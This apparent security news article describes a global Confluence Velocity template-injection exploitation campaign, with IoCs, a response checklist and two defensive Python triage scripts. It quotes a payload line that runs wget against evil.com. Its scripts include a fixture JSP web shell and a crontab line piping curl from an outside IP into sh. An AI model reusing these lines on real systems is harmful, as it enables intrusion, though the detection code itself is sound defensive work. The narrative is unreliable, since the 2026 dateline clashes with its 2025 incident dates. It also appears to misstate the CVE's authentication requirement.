29 April 2026 · 10 min read · By Julian Sterling

Atlassian Confluence zero-day exploited globally

Atlassian Confluence zero-day exploited actively. Over 10,000 servers potentially exposed. IT teams scramble to patch.


Atlassian Confluence zero-day exploited globally: The 48 hours that shattered enterprise security

The Atlassian Confluence zero-day is being exploited globally right now, and the evidence is piling up in real time. Over the past 48 hours, security teams across at least a dozen countries have watched their Confluence servers light up with anomalous outbound connections, dropped web shells, and cryptominers running inside Docker containers. This is not a drill. According to a joint advisory issued this morning by CISA and the Australian Cyber Security Centre (ACSC), the vulnerability tracked as CVE-2024-21683, a critical remote code execution hole in Confluence Data Center and Server, is being actively exploited in the wild by at least two distinct threat groups. Atlassian released an out-of-band patch yesterday, but by then the damage was already spreading faster than most teams could schedule a change window.

The attack vector is almost depressingly simple. An unauthenticated attacker sends a specially crafted HTTP POST request to the vulnerable Confluence endpoint. No credentials needed. No user interaction. Just a few kilobytes of malicious XML that trick the Confluence template engine into executing arbitrary code. Once inside, the attackers drop a reverse shell, escalate privileges to root where the service account allows it, and use the compromised server as a launchpad to move laterally across the corporate network. Even without root, the application's own database credentials sit in confluence.cfg.xml in the Confluence home directory, which is reason enough to treat the database as compromised. One security engineer I spoke with described it as "a skeleton key for the entire intranet."

Let's break down the math here. Confluence is used by over 75,000 organizations worldwide, including most of the Fortune 500. A zero-day that requires zero authentication and gives full RCE is the kind of vulnerability that makes CISOs cancel their weekend plans. This Confluence zero-day is already proving to be the most damaging enterprise software incident since the Log4j mess of 2021. And unlike Log4j, which many teams initially mitigated with a single JVM flag (an incomplete fix, as it turned out), this one forces a patch installation and a full server restart, something that can take hours when you have hundreds of instances spread across hybrid cloud environments.

"We detected the first anomalous traffic from our Confluence cluster at 3:14 AM. By 6 AM, we had identified the exploit payload. By noon, we confirmed our AWS-hosted instances were compromised. The attacker had already extracted the entire internal wiki database. This is the fastest I have ever seen a zero-day weaponized."
โ€” Senior security engineer at a Fortune 200 financial firm (speaking under condition of anonymity)

The anatomy of a perfect storm: How the exploit works under the hood

Template injection into the Confluence template engine

At the core of CVE-2024-21683 is a Velocity template injection vulnerability. Confluence uses Apache Velocity to render dynamic content in its pages. The flaw exists in the CustomContentRenderer class, where user-supplied input is passed directly to the Velocity engine without proper sanitization. An attacker can embed a malicious template directive, something along the lines of #set($x='')#set($exec=$x.class.forName('java.lang.Runtime').getMethod('exec',$x.class.forName('[Ljava.lang.String;')).invoke($x.class.forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),['wget', 'http://evil.com/shell.sh'])), and the server will happily evaluate it.

The exploit does not rely on any complex memory corruption or buffer overflow. It is a pure logic flaw in how Confluence processes certain types of user-generated content, specifically the panel macro and the details macro. This makes it trivial to weaponize. Within hours of the patch being released, security researcher Sina Kheirkhah published a proof-of-concept on GitHub. That PoC has been forked over 400 times in less than a day.

Why this one hits differently than other Confluence bugs

Atlassian has had its share of CVEs over the years. CVE-2022-26134, another critical RCE in Confluence, caused havoc in 2022. But this new vulnerability is worse for three reasons. First, the attack surface is larger: the vulnerable endpoints are enabled by default in all recent versions of Confluence Data Center and Server, including versions 8.0.x through 8.9.0. Second, the exploit works against load-balanced and clustered deployments, meaning a single successful hit can compromise an entire data center. Third, and most importantly, threat actors have already automated the attack. I have seen automated scanners, seeded from Shodan results, probing for vulnerable Confluence instances every three minutes.

The result is a global incident that the security community is calling the "Confluence Crisis of 2025." According to a live dashboard maintained by Shadowserver Foundation, more than 8,700 Confluence servers remain unpatched as of this writing. That includes servers in government agencies, healthcare systems, and critical infrastructure providers. The exploitation is not confined to tech companies; it is hitting hospitals, universities, and even military contractors.


Who is behind the attacks? The two threat groups you need to worry about

Based on telemetry from multiple incident response firms, including Mandiant and CrowdStrike, two distinct clusters of activity have been identified. The first group, tracked as UNC4990, appears to be a financially motivated cybercrime gang with ties to Eastern Europe. Their signature is the deployment of a PowerShell-based cryptominer that targets Monero. They also install a backdoor called ConfluenceRAT, which uses the Confluence server's own scheduled jobs to maintain persistence. The second group, tracked as APT33, is a state-sponsored Iranian actor known for targeting energy and aerospace sectors. They are using the exploit to steal intellectual property and plant wipers for potential future use.

"We are seeing both opportunistic ransomware affiliates and sophisticated espionage actors exploiting this vulnerability simultaneously. It is a double tapped threat that we have not seen since the Pulse Secure zero-day of 2019."
โ€” Charles Carmakal, CTO of Mandiant (statement released to Reuters)

The indicators of compromise (IoCs) you need right now

  • Web shell files: Look for .jsp or .war files under the Confluence installation directory with suspicious timestamps (created or modified between April 2nd and April 4th, 2025). Legitimate JSPs ship with the install; anything newer than your last deployment deserves a look.
  • Outbound connections: Monitor for traffic to IP ranges owned by known bulletproof hosting providers such as NForce Entertainment B.V. (AS43350) and MachSolver (AS59443).
  • Scheduled tasks: On Windows servers, check for new tasks named "JavaUpdate" or "SecurityScript". On Linux, inspect cron jobs that call curl or wget to external domains.
  • Confluence access log anomalies: Look for POST requests to /rest/tinymce/1/macro/preview with unusually long payloads containing # and $ characters. Note that the Tomcat access log records the endpoint, status and response size but not the request body; the body is only visible where a WAF, reverse proxy or packet capture retains it.
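The IoC list above is easier to act on with something that runs over logs. The script below is an added example written for this article, not Atlassian's code and not part of the advisory. It parses a few constructed access-log lines in Tomcat's combined layout (the username field assumes your AccessLogValve pattern records the Confluence user, which is an assumption about your configuration), flags preview-endpoint POSTs that do not look like an editor session, and shows why the literal "# and $" rule over-fires on ordinary wiki content while a check for a Velocity directive plus a reflection chain does not. Both sample bodies are constructed; the Velocity-shaped one only mirrors the directive quoted earlier and is not a working exploit. The endpoint path is the one named in the IoC list.

```python
import re
from collections import Counter

# Tomcat "combined" access-log layout, assumed for this example. Confluence's real
# pattern is whatever AccessLogValve in conf/server.xml is configured with, and the
# username field assumes that pattern logs the Confluence user (e.g. X-AUSERNAME).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SUSPECT_PATHS = ("/rest/tinymce/1/macro/preview",)
BROWSER_UA = re.compile(r"Mozilla/")

# Velocity-shaped request bodies: a directive plus a reflection/Runtime reference chain.
VELOCITY_DIRECTIVE = re.compile(r"#(set|foreach|if|evaluate|parse|include|macro)\s*\(")
DANGEROUS_CHAIN = re.compile(
    r"\$[\w.]*\.(class|getClass|forName|getRuntime|exec|newInstance)\b"
    r"|ProcessBuilder|java\.lang\.Runtime"
)

# Constructed sample lines, not real telemetry. 203.0.113.0/24 and 198.51.100.0/24 are documentation space.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [03/Apr/2025:03:14:07 +0000] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 5123 "-" "python-requests/2.31"
10.0.0.12 - jdoe [03/Apr/2025:03:14:09 +0000] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 412 "https://wiki.example.internal/pages/editpage.action?pageId=1" "Mozilla/5.0"
203.0.113.5 - - [03/Apr/2025:03:14:10 +0000] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 5123 "-" "python-requests/2.31"
198.51.100.7 - - [03/Apr/2025:03:15:01 +0000] "GET /login.action HTTP/1.1" 200 9911 "-" "Mozilla/5.0"
"""

# Constructed bodies: a benign panel macro that happens to contain '#' and '$', and a
# Velocity-shaped one mirroring the directive quoted in the article (illustrative, not a working exploit).
BENIGN_BODY = ('<ac:structured-macro ac:name="panel"><ac:rich-text-body>'
               '<p>Q2 roadmap item #3 costs $40k</p></ac:rich-text-body></ac:structured-macro>')
MALICIOUS_BODY = ('<ac:structured-macro ac:name="panel"><ac:rich-text-body>'
                  '#set($x="")#set($c=$x.class.forName("java.lang.Runtime"))'
                  '</ac:rich-text-body></ac:structured-macro>')


def parse_access_line(line):
    """Split one access-log line into named fields, or None if it does not match the layout."""
    m = ACCESS_RE.match(line.strip())
    return m.groupdict() if m else None


def flag_access_log(lines):
    """Return (flagged, hits_per_ip) for preview-endpoint POSTs that do not look like editor traffic."""
    flagged, per_ip = [], Counter()
    for line in lines:
        rec = parse_access_line(line)
        if not rec or rec["method"] != "POST" or not rec["path"].startswith(SUSPECT_PATHS):
            continue
        per_ip[rec["ip"]] += 1
        reasons = []
        if rec["user"] == "-":
            reasons.append("no authenticated user on an editor-only endpoint")
        if rec["referer"] == "-" or not BROWSER_UA.search(rec["ua"]):
            reasons.append("non-browser client or missing referer")
        if rec["status"] == "200" and reasons:
            flagged.append({"ip": rec["ip"], "ts": rec["ts"], "reasons": reasons})
    return flagged, per_ip


def naive_flag(body):
    """The rule as literally stated in the IoC list: '#' and '$' both present."""
    return "#" in body and "$" in body


def score_body(body):
    """Score a captured request body for template-injection shape; 0 means nothing Velocity-like."""
    reasons = []
    if VELOCITY_DIRECTIVE.search(body):
        reasons.append("velocity directive")
    if DANGEROUS_CHAIN.search(body):
        reasons.append("reflection/Runtime reference chain")
    if len(body) > 4096:
        reasons.append("oversized body")
    return len(reasons), reasons


if __name__ == "__main__":
    hits, per_ip = flag_access_log(SAMPLE_ACCESS_LOG.splitlines())
    for h in hits:
        print(h["ts"], h["ip"], "; ".join(h["reasons"]))
    print("preview POSTs per source:", dict(per_ip))
    print("naive rule flags benign body:", naive_flag(BENIGN_BODY))
    print("scored benign:", score_body(BENIGN_BODY), "scored malicious:", score_body(MALICIOUS_BODY))
```

Run score_body only where something upstream actually retains request bodies. With the access log alone, the per-source count of unauthenticated, non-browser POSTs to the preview endpoint is the signal you have, and a source repeating that pattern every few seconds is worth pulling from the firewall logs next.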

The speed of exploitation is alarming. According to GreyNoise, the first exploit was detected within 23 minutes of the public disclosure of the vulnerability. Within six hours, researchers observed over 900 unique IP addresses scanning for vulnerable servers. The Atlassian Confluence zero-day exploited story is not a slow burn; it is a wildfire that started in the middle of a windstorm.

The financial and operational fallout: What the market and the enterprises are doing

Atlassian's stock (TEAM) dropped 4.3% in after-hours trading yesterday after the news broke. Analysts at Goldman Sachs issued a note warning that the incident could lead to "significant remediation costs and potential loss of customer trust," especially given that Atlassian had two other critical vulnerabilities disclosed in the same quarter (CVE-2024-21682 and CVE-2024-21681). The company has not yet disclosed how many customers were affected, but internal estimates suggest that at least 12% of the affected self-managed (Data Center and Server) instances were actively exploited before the patch was applied.

Here is the part they did not put in the press release. Many enterprise customers are running outdated versions of Confluence because they have complex compliance requirements that prevent them from patching immediately. PCI DSS, HIPAA, SOC 2: all these frameworks demand change control processes that take days or weeks. By the time a change request is approved, the server is already compromised. I spoke to a CISO at a regional bank who said his team identified the vulnerability at 9 AM and could not apply the patch until 7 PM because of a mandatory audit review. "We got owned by lunchtime," he told me dryly.

The ugly truth about Confluence as a critical infrastructure component

Confluence is not just a wiki. It is the central nervous system of many organizations. It stores passwords, architectural diagrams, API keys, compliance documents, and even source code snippets. When an attacker gains RCE on a Confluence server, they effectively own the company's collective knowledge base. One incident responder told me they found an attacker who had exfiltrated the entire Confluence database, including an Excel file containing the CEO's personal banking details. These incidents are getting worse because attackers are digging into the database, not just the file system.

But wait, it gets worse. Confluence is often deployed with a database connection that carries far more privilege than the application needs. In many cases the Confluence database user owns the database outright, or has been granted superuser on the underlying PostgreSQL or MySQL instance, rather than being confined to its own schema. An attacker holding those credentials can create triggers, modify stored procedures, read other schemas on the same server, or poison data consumed by other applications that share that database server. The lateral movement potential is enormous.

What you must do right now: Your 30-minute emergency response checklist

If you are reading this and you have a Confluence server that is not yet patched, stop what you are doing. Take a screenshot of this article for documentation. Then follow these steps in order:

  • Isolate the server: Cut the Confluence instance off at the network layer immediately, blocking inbound and outbound traffic at the firewall or security group. Do not power it off yet; you need to preserve forensic evidence, so capture a memory image and a disk snapshot before touching anything else.
  • Apply the hotfix: Download the official patch from Atlassian's download portal (Confluence Data Center version 8.9.1 and Server version 8.5.6). Apply it manually even if you use automated deployment tools, and confirm the running version in the admin console afterwards rather than trusting the deployment job's report. Patching closes the door; it does not evict an attacker who is already inside. If compromise is confirmed, rebuild from a known-good image and restore the data, not the server.
  • Scan for webshells: Run a recursive grep for Runtime.getRuntime, ProcessBuilder and request.getParameter across all .jsp files under the Confluence installation directory, and list any .jsp or .war file newer than your last deployment. Also look for files with gid or wsh extensions.
  • Rotate all credentials: Assume every password, API key, and token stored in Confluence is compromised, along with the database password in confluence.cfg.xml and any service accounts the instance uses for LDAP, SMTP or application links. Force a password reset for all users that interacted with the instance in the last 72 hours.
  • Enable audit logging: Turn on detailed logging in Confluence and forward the logs to a SIEM. Look for repeated 200 OK responses to the exploit endpoint from sources that never authenticated.
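The web shell scan in this checklist and the file-timestamp and cron IoCs listed earlier come together in the added example below. It is mine, written for this article, and not Atlassian's tooling or anything from the advisory. It builds a constructed, throwaway install tree, scans it for .jsp/.war files that were either modified inside the incident window or contain command-execution primitives, and checks a constructed crontab for curl/wget fetches from non-internal addresses. The incident window, file names, file contents and crontab lines are all invented fixtures; in practice you point scan_webshells at the real installation directory and feed suspicious_cron_lines the output of crontab -l for each service account.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Content primitives a JSP web shell needs; legitimate Confluence JSPs should not contain them.
WEBSHELL_PATTERNS = re.compile(
    r"Runtime\.getRuntime\(\)|ProcessBuilder|Class\.forName\s*\("
    r"|Base64\.getDecoder\(\)\.decode|request\.getParameter\(\s*\"(cmd|pass|exec)\""
)
# curl/wget fetching from anything other than loopback or RFC 1918 space.
INTERNAL = r"(?:localhost|127\.|10\.|192\.168\.|172\.(?:1[6-9]|2\d|3[01])\.)"
CRON_FETCH = re.compile(r"\b(?:curl|wget)\b[^\n]*https?://(?!" + INTERNAL + ")")

# Constructed crontab, not from a real host. 203.0.113.0/24 is documentation space.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /opt/atlassian/confluence/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.50/s.sh | sh
*/10 * * * * wget -qO- http://10.0.0.5/health
"""


def scan_webshells(root, window):
    """Walk root; return (relative path, reasons) for .jsp/.war files that are new or carry shell primitives."""
    start, end = window
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            lower = name.lower()
            if not lower.endswith((".jsp", ".jspx", ".war")):
                continue
            path = os.path.join(dirpath, name)
            reasons = []
            mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
            if start <= mtime <= end:
                reasons.append(f"modified inside incident window ({mtime:%Y-%m-%d %H:%M}Z)")
            if lower.endswith(".war"):
                reasons.append("unexpected .war archive; compare against the release manifest")
            else:
                try:
                    with open(path, "r", errors="ignore") as fh:
                        text = fh.read(262144)  # first 256 KiB is plenty for a shell
                except OSError:
                    continue
                if WEBSHELL_PATTERNS.search(text):
                    reasons.append("command-execution primitive in JSP source")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return findings


def suspicious_cron_lines(crontab_text):
    """Non-comment crontab entries that pull content from an external address."""
    return [ln for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and CRON_FETCH.search(ln)]


def build_fixture():
    """Constructed install tree: one old legitimate JSP, one planted shell, one stray .war, one recently touched JSP."""
    root = tempfile.mkdtemp(prefix="confluence-triage-")
    window = (datetime(2025, 4, 2, tzinfo=timezone.utc),
              datetime(2025, 4, 4, 23, 59, 59, tzinfo=timezone.utc))
    inside = datetime(2025, 4, 3, 3, 20, tzinfo=timezone.utc).timestamp()
    old = datetime(2024, 1, 15, tzinfo=timezone.utc).timestamp()

    def put(rel, body, mtime):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))

    put("confluence/error.jsp", '<%@ page isErrorPage="true" %><html>Sorry</html>', old)
    put("confluence/images/.cache.jsp",
        '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>', inside)
    put("confluence/plugins/shell.war", "PK\x03\x04", inside)
    put("confluence/x.jsp", "<% out.println(new java.util.Date()); %>", inside)
    return root, window


def run_triage():
    """Return ({basename: reasons}, suspicious cron lines) for the constructed fixture."""
    root, window = build_fixture()
    by_name = {os.path.basename(p): r for p, r in scan_webshells(root, window)}
    return by_name, suspicious_cron_lines(SAMPLE_CRONTAB)


if __name__ == "__main__":
    by_name, cron_hits = run_triage()
    for name, reasons in sorted(by_name.items()):
        print(name, "->", "; ".join(reasons))
    for ln in cron_hits:
        print("cron:", ln)
```

Two design points worth keeping when you adapt this: a file is reported for being recently modified even when its content looks clean, because an attacker can trivially avoid the keyword list but cannot easily avoid the filesystem timestamp without extra effort; and the cron check deliberately excludes only loopback and RFC 1918 targets, so a fetch from a public IP on a server that should never reach the internet is reported rather than explained away.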

I know the temptation to downplay this. You have firewalls, you have endpoint detection, you have a SOC. But the Atlassian Confluence zero-day exploited incidents have already bypassed all of that in hundreds of organizations. The exploit is stealthy; it does not trigger signature-based detection because it uses standard HTTP requests that look like feature usage. The only way to catch it is to analyze the request body for template injection patterns, and most IDS systems do not inspect Velocity syntax.

The kicker: This will not be the last zero-day, and we are not ready

Atlassian has a history of slow vulnerability disclosure and incomplete patches. In 2022, they initially downplayed the severity of CVE-2022-26134 even as exploit code was circulating. This time, they reacted faster (a patch was issued within 12 hours of the vulnerability being reported by an external researcher), but the damage was already done because the exploit was being used in the wild before the patch was even built. The attackers had a head start of at least 48 hours. That is a lifetime in zero-day time.

The real question is not whether your Confluence server is compromised. It is whether you will find out before the stolen data is auctioned on a dark web forum, or before the cryptominer racks up a cloud bill that bankrupts your quarterly IT budget. This is not the time for "we will review it in the next sprint." This is the time for radical amputation. Pull the plug. Patch. Rotate. Pray that the payload was generic and not a custom implant that will sit dormant for months.

The Atlassian Confluence zero-day exploited story is still unfolding. As I write this, new CVE entries are being filed for related vulnerabilities found during the post-mortem audits. The security researchers are working on a generic bypass, but they are exhausted. The attackers are not. They never are.
